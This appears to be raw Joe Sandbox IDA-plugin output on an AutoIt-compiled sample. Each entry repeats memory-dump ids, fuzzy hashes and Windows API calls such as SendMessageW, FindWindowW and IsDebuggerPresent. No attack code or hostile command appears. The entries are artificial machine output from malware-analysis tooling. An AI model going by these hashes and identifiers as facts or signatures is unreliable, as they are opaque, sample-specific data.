                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 624084870-1403004172
                                                                    • Opcode ID: d8ab0f13537a0a201814c53bcc52838584882dc7a5646d4c3740f66495f24684
                                                                    • Instruction ID: a0ec848224502dc1f665e2e2cacf8fabc72852782b1caea7b02caffe6642fd07
                                                                    • Opcode Fuzzy Hash: d8ab0f13537a0a201814c53bcc52838584882dc7a5646d4c3740f66495f24684
                                                                    • Instruction Fuzzy Hash: AB01D8B1A41214AB8B18FFA4CC51DFE7368FB47350B140A19F862972D1EA7059488661
                                                                    APIs
                                                                      • Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD
                                                                      • Part of subcall function 00943CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00943CCA
                                                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 00941C46
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 624084870-1403004172
                                                                    • Opcode ID: 829f393369aa152e0b91e86d1ee19751c518d9f5f3d77452191b23432963960e
                                                                    • Instruction ID: da48cc0bcd4bf2efa5a008c8ec055e667ff16aab2188bbf360c7136251e599ba
                                                                    • Opcode Fuzzy Hash: 829f393369aa152e0b91e86d1ee19751c518d9f5f3d77452191b23432963960e
                                                                    • Instruction Fuzzy Hash: 3C01A77578111867CB18FBA4CD92EFF77ACEB52341F140419E886A7281EA649F48C6B2
                                                                    APIs
                                                                      • Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD
                                                                      • Part of subcall function 00943CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00943CCA
                                                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 00941CC8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 624084870-1403004172
                                                                    • Opcode ID: 0a6080373302c317f468df9dbe42f988b6fc985282c346a1742b9469ad77e41b
                                                                    • Instruction ID: 87068d18fe16c69a111eeaa11afd354a2eeab63989dc265aa6871f2ceacb8907
                                                                    • Opcode Fuzzy Hash: 0a6080373302c317f468df9dbe42f988b6fc985282c346a1742b9469ad77e41b
                                                                    • Instruction Fuzzy Hash: E901D6B179011867CB14FBA5CE91EFE73ACAB12341F540419BC82B3281FA609F48C6B2
                                                                    APIs
                                                                      • Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD
                                                                      • Part of subcall function 00943CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00943CCA
                                                                    • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00941DD3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 624084870-1403004172
                                                                    • Opcode ID: ffc8a816e6e84690f5e372392cb809fed60e8ded62b030d34cda5a938643bdf1
                                                                    • Instruction ID: 714184f2bade47b9b643e7f5f6fd796d06123c14f64bdfe1bc6c793276b9a935
                                                                    • Opcode Fuzzy Hash: ffc8a816e6e84690f5e372392cb809fed60e8ded62b030d34cda5a938643bdf1
                                                                    • Instruction Fuzzy Hash: CEF0A4B1F5121466DB14F7A9CC92FFE776CFB42350F540D19F862A32C1EAA05A4882A1
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen
                                                                    • String ID: 3, 3, 16, 1
                                                                    • API String ID: 176396367-3042988571
                                                                    • Opcode ID: fd3102558ddeb3f8179a86ad98873fba75d494861c7639be238c53a39e8b4e84
                                                                    • Instruction ID: 70eb26b633ca3eda494f64afb3339bbb43c4610a60050b2bf3a28065de0911e5
                                                                    • Opcode Fuzzy Hash: fd3102558ddeb3f8179a86ad98873fba75d494861c7639be238c53a39e8b4e84
                                                                    • Instruction Fuzzy Hash: 14E02B4220522014D23112BAACC5B7FD68ECFC5F90710183BFE81C22BAEE948D9193A1
                                                                    APIs
                                                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00940B23
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Message
                                                                    • String ID: AutoIt$Error allocating memory.
                                                                    • API String ID: 2030045667-4017498283
                                                                    • Opcode ID: ac3801bb8f992d23ac3fe2d3eba4f4e036129e272f2311792ec034251a2a04ed
                                                                    • Instruction ID: b9d84d7a6bb80fead54510ae23419fbd2ed667e62fc21a9e55d91ad0cf092697
                                                                    • Opcode Fuzzy Hash: ac3801bb8f992d23ac3fe2d3eba4f4e036129e272f2311792ec034251a2a04ed
                                                                    • Instruction Fuzzy Hash: 7AE0D8733443082AD21436587C03F897A84DF45B54F10442EF78CD94C38AE1249006EA
                                                                    APIs
                                                                      • Part of subcall function 008FF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00900D71,?,?,?,008E100A), ref: 008FF7CE
                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,008E100A), ref: 00900D75
                                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,008E100A), ref: 00900D84
                                                                    Strings
                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00900D7F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                    • API String ID: 55579361-631824599
                                                                    • Opcode ID: c03e9510445c91ed41674ba170f8e08e17b6d3736db80e40edb5490d1de748bd
                                                                    • Instruction ID: 19a1d949961e509047e756cf31c3a044eb965aab9b8ce41590551346caeb41e7
                                                                    • Opcode Fuzzy Hash: c03e9510445c91ed41674ba170f8e08e17b6d3736db80e40edb5490d1de748bd
                                                                    • Instruction Fuzzy Hash: 2AE06DB12007418FD7309FB8E8043467BE4BF40744F00892DE49AC6692EBB0E4888BA2
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: LocalTime
                                                                    • String ID: %.3d$X64
                                                                    • API String ID: 481472006-1077770165
                                                                    • Opcode ID: 17cffa6fdd60d89bbf8bebee0ecac0d541e2b51d8caec1a9c262886decccb497
                                                                    • Instruction ID: 519608edb77107da452723280d53968071e97ae755539fa458becd72c00c65c6
                                                                    • Opcode Fuzzy Hash: 17cffa6fdd60d89bbf8bebee0ecac0d541e2b51d8caec1a9c262886decccb497
                                                                    • Instruction Fuzzy Hash: 1DD012A280A10CE9CB9096E0EC558BBB37CFB48301F608852FA26D1041DA38D548AF62
                                                                    APIs
                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0097232C
                                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0097233F
                                                                      • Part of subcall function 0094E97B: Sleep.KERNEL32 ref: 0094E9F3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: FindMessagePostSleepWindow
                                                                    • String ID: Shell_TrayWnd
                                                                    • API String ID: 529655941-2988720461
                                                                    • Opcode ID: 05bf0da8f85663fe560257162064e764dce01116eb04f4b8d39b595b3b8f854b
                                                                    • Instruction ID: be4a1eaddaf32935ac970b04a8f08abf6083f6c34c9bddb4a49a0682c0bc37fb
                                                                    • Opcode Fuzzy Hash: 05bf0da8f85663fe560257162064e764dce01116eb04f4b8d39b595b3b8f854b
                                                                    • Instruction Fuzzy Hash: 92D012773A8310B7E764B770DC4FFC67A14AB40B14F01491EB749AA1D0C9F0A841DA54
                                                                    APIs
                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0097236C
                                                                    • PostMessageW.USER32(00000000), ref: 00972373
                                                                      • Part of subcall function 0094E97B: Sleep.KERNEL32 ref: 0094E9F3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: FindMessagePostSleepWindow
                                                                    • String ID: Shell_TrayWnd
                                                                    • API String ID: 529655941-2988720461
                                                                    • Opcode ID: 73f0eb1977737fef25cf414e527aa804aeb7b88ade791e146501fbd6ca3554d9
                                                                    • Instruction ID: 54f39d3020dc268e137434a00d948b016fd43724d59caa25d004a7240a7281f0
                                                                    • Opcode Fuzzy Hash: 73f0eb1977737fef25cf414e527aa804aeb7b88ade791e146501fbd6ca3554d9
                                                                    • Instruction Fuzzy Hash: 47D0C9723A9310BAE664A7709C4FFC66614AB45B14F01491AB649AA1D0C9A0A8419A58
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0091BE93
                                                                    • GetLastError.KERNEL32 ref: 0091BEA1
                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0091BEFC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$ErrorLast
                                                                    • String ID:
                                                                    • API String ID: 1717984340-0
                                                                    • Opcode ID: ead8985164ff2191af7a55e9adfdc4fd351efc3553aca857bbd38c11a1c04648
                                                                    • Instruction ID: b4e0f1f721fed9c94975dd1900cd8bf655570e44c4ecf94c663e49ed0cee0fdf
                                                                    • Opcode Fuzzy Hash: ead8985164ff2191af7a55e9adfdc4fd351efc3553aca857bbd38c11a1c04648
                                                                    • Instruction Fuzzy Hash: 2C41EA3570420AAFCF21AF65CC54BFA7BAAEF41720F144169F959972E1DB308D82DB90